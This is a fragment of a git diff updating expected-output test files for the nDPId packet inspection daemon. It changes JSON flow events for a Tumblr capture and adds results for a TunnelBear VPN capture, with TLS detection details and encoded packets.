-00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":289,"flow_first_seen":1605292105170,"flow_last_seen":1605292122449,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":187188,"flow_avg_l4_payload_len":647,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43420,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":326,"flow_first_seen":1605292105171,"flow_last_seen":1605292122739,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":185805,"flow_avg_l4_payload_len":569,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43434,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1605292121486,"flow_last_seen":1605292122503,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":24052,"flow_avg_l4_payload_len":387,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a16","src_port":43328,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"}} +00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":289,"flow_first_seen":1605292105170,"flow_last_seen":1605292122449,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":187188,"flow_avg_l4_payload_len":647,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43420,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":326,"flow_first_seen":1605292105171,"flow_last_seen":1605292122739,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":185805,"flow_avg_l4_payload_len":569,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43434,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43602,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00611{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43602,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00619{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":28,"flow_first_seen":1605292105726,"flow_last_seen":1605292122804,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":1371,"flow_avg_l4_payload_len":48,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4c03","src_port":51874,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":63,"flow_first_seen":1605292122095,"flow_last_seen":1605292122344,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3141,"flow_tot_l4_payload_len":39546,"flow_avg_l4_payload_len":627,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200a","src_port":38608,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} +00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":63,"flow_first_seen":1605292122095,"flow_last_seen":1605292122344,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3141,"flow_tot_l4_payload_len":39546,"flow_avg_l4_payload_len":627,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200a","src_port":38608,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} 00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292120654,"flow_last_seen":1605292120853,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":55014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292120654,"flow_last_seen":1605292120853,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":55014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} @@ -278,9 +278,9 @@ ~~ total active/idle flows...: 47/47 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 7071543 bytes -~~ total memory freed........: 7071543 bytes -~~ total allocations/frees...: 143134/143134 +~~ total memory allocated....: 7205177 bytes +~~ total memory freed........: 7205177 bytes +~~ total allocations/frees...: 145896/145896 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 462 chars ~~ json string max len.......: 1395 chars diff --git a/test/results/tunnelbear.pcap.out b/test/results/tunnelbear.pcap.out new file mode 100644 index 000000000..372fd2e49 --- /dev/null +++ b/test/results/tunnelbear.pcap.out @@ -0,0 +1,163 @@ +00461{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"tunnelbear.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} +00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"tunnelbear.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1655734524312} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655734524312,"flow_last_seen":1655734524312,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655734524312,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.154.236","src_port":50178,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1655734524312,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655734524312,"pkt":"ABoRAAACABoRAAABCABFAAA8wQ5AAEAGbKcKCAABaBGa7MQCAbs6\/WaPAAAAAKAC\/\/8qygAAAgQFtAQCCAoBY6eBAAAAAAEDAwg="} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1655734524319,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734524319,"pkt":"ABoRAAACABoRAAABCABFAAAoAFRAABAGXXZoEZrsCggAAQG7xALFAplwOv1mkFAS\/\/\/dDQAA"} +00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1655734524319,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734524319,"pkt":"ABoRAAACABoRAAABCABFAAAowQ9AAEAGbLoKCAABaBGa7MQCAbs6\/WaQxQKZcVAQ\/\/\/dDgAA"} +00853{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655734524312,"flow_last_seen":1655734524320,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1655734524320,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.154.236","src_port":50178,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.tunnelbear.com","ja3":"a1c672bda2bda1a05bdca801144b2760","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655734524335,"flow_last_seen":1655734524335,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655734524335,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.115.40","src_port":45104,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1655734524335,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655734524335,"pkt":"ABoRAAACABoRAAABCABFAAA8r3BAAEAGpgkKCAABaBFzKLAwAbtQpAj3AAAAAKAC\/\/+uSwAAAgQFtAQCCAoBY6eHAAAAAAEDAwg="} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1655734524340,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734524340,"pkt":"ABoRAAACABoRAAABCABFAAAoAFZAABAGhThoEXMoCggAAQG7sDCvW\/cIUKQI+FAS\/\/8YpAAA"} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655734524340,"flow_last_seen":1655734524340,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655734524340,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.115.40","src_port":45106,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1655734524340,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655734524340,"pkt":"ABoRAAACABoRAAABCABFAAA8hAJAAEAG0XcKCAABaBFzKLAyAbsgvSOFAAAAAKAC\/\/\/DogAAAgQFtAQCCAoBY6eHAAAAAAEDAwg="} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1655734524343,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734524343,"pkt":"ABoRAAACABoRAAABCABFAAAoAFdAABAGhTdoEXMoCggAAQG7sDLfQtx6IL0jhlAS\/\/8YogAA"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655734524343,"flow_last_seen":1655734524343,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655734524343,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.115.40","src_port":45108,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1655734524343,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655734524343,"pkt":"ABoRAAACABoRAAABCABFAAA8b31AAEAG5fwKCAABaBFzKLA0Abv3yMj6AAAAAKAC\/\/9HHwAAAgQFtAQCCAoBY6eHAAAAAAEDAwg="} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1655734524345,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734524345,"pkt":"ABoRAAACABoRAAABCABFAAAoAFhAABAGhTZoEXMoCggAAQG7sDQINzcF98jI+1AS\/\/8YoAAA"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1655734524345,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734524345,"pkt":"ABoRAAACABoRAAABCABFAAAor3FAAEAGphwKCAABaBFzKLAwAbtQpAj4r1v3CVAQ\/\/8YpQAA"} +00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655734524335,"flow_last_seen":1655734524345,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1655734524345,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.115.40","src_port":45104,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.polargrizzly.com","ja3":"e9ec38c2b40ff3e300e9975dd7619902","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655734524346,"flow_last_seen":1655734524346,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655734524346,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.115.40","src_port":45114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1655734524346,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655734524346,"pkt":"ABoRAAACABoRAAABCABFAAA8HIhAAEAGOPIKCAABaBFzKLA6AbvglrsBAAAAAKAC\/\/9sQgAAAgQFtAQCCAoBY6eJAAAAAAEDAwg="} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1655734524346,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734524346,"pkt":"ABoRAAACABoRAAABCABFAAAoAFpAABAGhTRoEXMoCggAAQG7sDofaUT+4Ja7AlAS\/\/8YmgAA"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1655734524347,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734524347,"pkt":"ABoRAAACABoRAAABCABFAAAohANAAEAG0YoKCAABaBFzKLAyAbsgvSOG30Lce1AQ\/\/8YowAA"} +00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655734524340,"flow_last_seen":1655734524347,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1655734524347,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.115.40","src_port":45106,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.polargrizzly.com","ja3":"e9ec38c2b40ff3e300e9975dd7619902","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1655734524347,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734524347,"pkt":"ABoRAAACABoRAAABCABFAAAob35AAEAG5g8KCAABaBFzKLA0Abv3yMj7CDc3BlAQ\/\/8YoQAA"} +00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655734524343,"flow_last_seen":1655734524347,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1655734524347,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.115.40","src_port":45108,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.polargrizzly.com","ja3":"e9ec38c2b40ff3e300e9975dd7619902","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1655734524347,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734524347,"pkt":"ABoRAAACABoRAAABCABFAAAoHIlAAEAGOQUKCAABaBFzKLA6AbvglrsCH2lE\/1AQ\/\/8YmwAA"} +00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655734524346,"flow_last_seen":1655734524347,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1655734524347,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.115.40","src_port":45114,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.polargrizzly.com","ja3":"e9ec38c2b40ff3e300e9975dd7619902","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01200{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":26,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1655734524335,"flow_last_seen":1655734524417,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3657,"flow_tot_l4_payload_len":4174,"flow_avg_l4_payload_len":695,"midstream":0,"thread_ts_msec":1655734524417,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.115.40","src_port":45104,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.polargrizzly.com","server_names":"*.polargrizzly.com,polargrizzly.com","ja3":"e9ec38c2b40ff3e300e9975dd7619902","ja3s":"9ebc57def2efb523f25c77af13aa6d48","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo ECC Domain Validation Secure Server CA","subjectDN":"CN=*.polargrizzly.com","alpn":"h2,http\/1.1","fingerprint":"1D:D9:82:8B:E8:9A:66:86:18:67:66:52:EE:02:6C:7D:09:12:B4:17"}} 